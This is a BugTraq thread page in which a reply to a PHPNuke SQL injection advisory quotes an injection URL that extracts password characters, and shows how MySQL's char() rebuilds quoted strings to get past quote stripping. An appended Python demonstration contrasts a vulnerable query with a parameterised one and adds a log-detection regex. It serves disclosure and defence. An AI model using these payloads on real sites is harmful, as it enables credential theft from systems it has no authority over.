BugTraq
PHPNuke SQL Injection Feb 20 2003 08:36PM
Lucas Armstrong (lucas cgishield com) (2 replies)
Re: PHPNuke SQL Injection / General SQL Injection Feb 21 2003 09:21PM
David Walker (bugtraq grax com) (1 replies)
Re: PHPNuke SQL Injection / General SQL Injection Feb 22 2003 09:20PM
MightyE (mightye mightye org)
Re: PHPNuke SQL Injection Feb 21 2003 07:11AM
Martin Eiszner (martin websec org)

hola,

On 20 Feb 2003 20:36:11 -0000
Lucas Armstrong <lucas (at) cgishield (dot) com [email concealed]> wrote:

> To get around this problem, one could use the mysql char()
> function which will output any ascii value, without using quotes. So to
> guess the letter 'a' the hacker could use char(97). Here is an example url
> guessing the 3rd character in the pwd column as 'a':
> http://site/modules.php?name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char(97)&type=stories

JFYI:

This may be off topic, but it is worth mentioning: a couple of months ago we found out
that the mysql char() function can be used within the like() function to place
quotes.

This may help somebody doing SQL injection in a "quote-stripped :-)" environment.

example query:
---*---
select id,Name,password from Users where id = 1 and (user() like "%root%");
---*---

and now "without" quotes:
---*---
select id,Name,password from Users where id = 1 and (user() like char(37,114,111,111,116,37));
---*---

...

nice day,

mEi

--
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE

mei (at) websec (dot) org [email concealed]
http://www.websec.org
tel: 0043 699 121772 37
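The point of the thread, shown end to end as an added example (this is not code from Martin's post, from Lucas's advisory or from PHPNuke): a filter that only strips quote characters does not stop a string literal from being built with char(), while a parameterised query treats the whole input as a value and is unaffected. It assumes SQLite instead of MySQL (SQLite's char() takes code points the same way and supports like), a constructed Users table with made-up rows, and a hypothetical quote-stripping filter named strip_quotes. A small detection helper is included that flags numeric char(...) calls in a request query string, exercised on the URL from Lucas's mail.

```python
import re
import sqlite3

# Constructed sample data (not from the original post).
SAMPLE_ROWS = [(1, "root", "s3cret"), (2, "alice", "hunter2")]


def make_db():
    """Build an in-memory database shaped like the post's Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table Users (id integer, Name text, password text)")
    conn.executemany("insert into Users values (?, ?, ?)", SAMPLE_ROWS)
    return conn


def strip_quotes(s):
    """Hypothetical 'quote-stripped' environment: drop ' and \" from input."""
    return s.replace("'", "").replace('"', "")


def vulnerable_lookup(conn, user_id):
    """Filtered input still concatenated into SQL.

    Quotes are gone, so a quoted literal breaks the statement (returns None),
    but char(37,114,111,111,116,37) still yields the string '%root%'.
    """
    sql = "select id,Name,password from Users where id = " + strip_quotes(user_id)
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None  # malformed SQL, e.g. the quotes were removed


def hardened_lookup(conn, user_id):
    """Parameterised query: the input is bound as a value, never parsed as SQL.

    SQLite applies the id column's integer affinity to the bound text, so "1"
    matches row 1 and "1 and (Name like char(...))" matches nothing.
    """
    return conn.execute(
        "select id,Name,password from Users where id = ?", (user_id,)
    ).fetchall()


# Matches char( <digits> [, <digits>]* ) as used to smuggle string literals.
_CHAR_CALL = re.compile(r"char\s*\(\s*\d+(\s*,\s*\d+)*\s*\)", re.IGNORECASE)


def looks_like_char_injection(query_string):
    """Return True if a request query string contains a numeric char(...) call."""
    return _CHAR_CALL.search(query_string) is not None


if __name__ == "__main__":
    db = make_db()
    payload = "1 and (Name like char(37,114,111,111,116,37))"  # '%root%'
    print("vulnerable:", vulnerable_lookup(db, payload))
    print("hardened:  ", hardened_lookup(db, payload))
    # Query string from the URL quoted in the thread, '+' decoded to spaces.
    url_qs = "name=search&query=&topic=&category=&author=&days=1 or mid(a.pwd,3,1)=char(97)&type=stories"
    print("flagged:   ", looks_like_char_injection(url_qs))
```

The detection regex is a coarse check meant for log review, not a filter; the actual fix is the parameterised form, since any escaping or stripping scheme leaves the input inside the SQL grammar.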
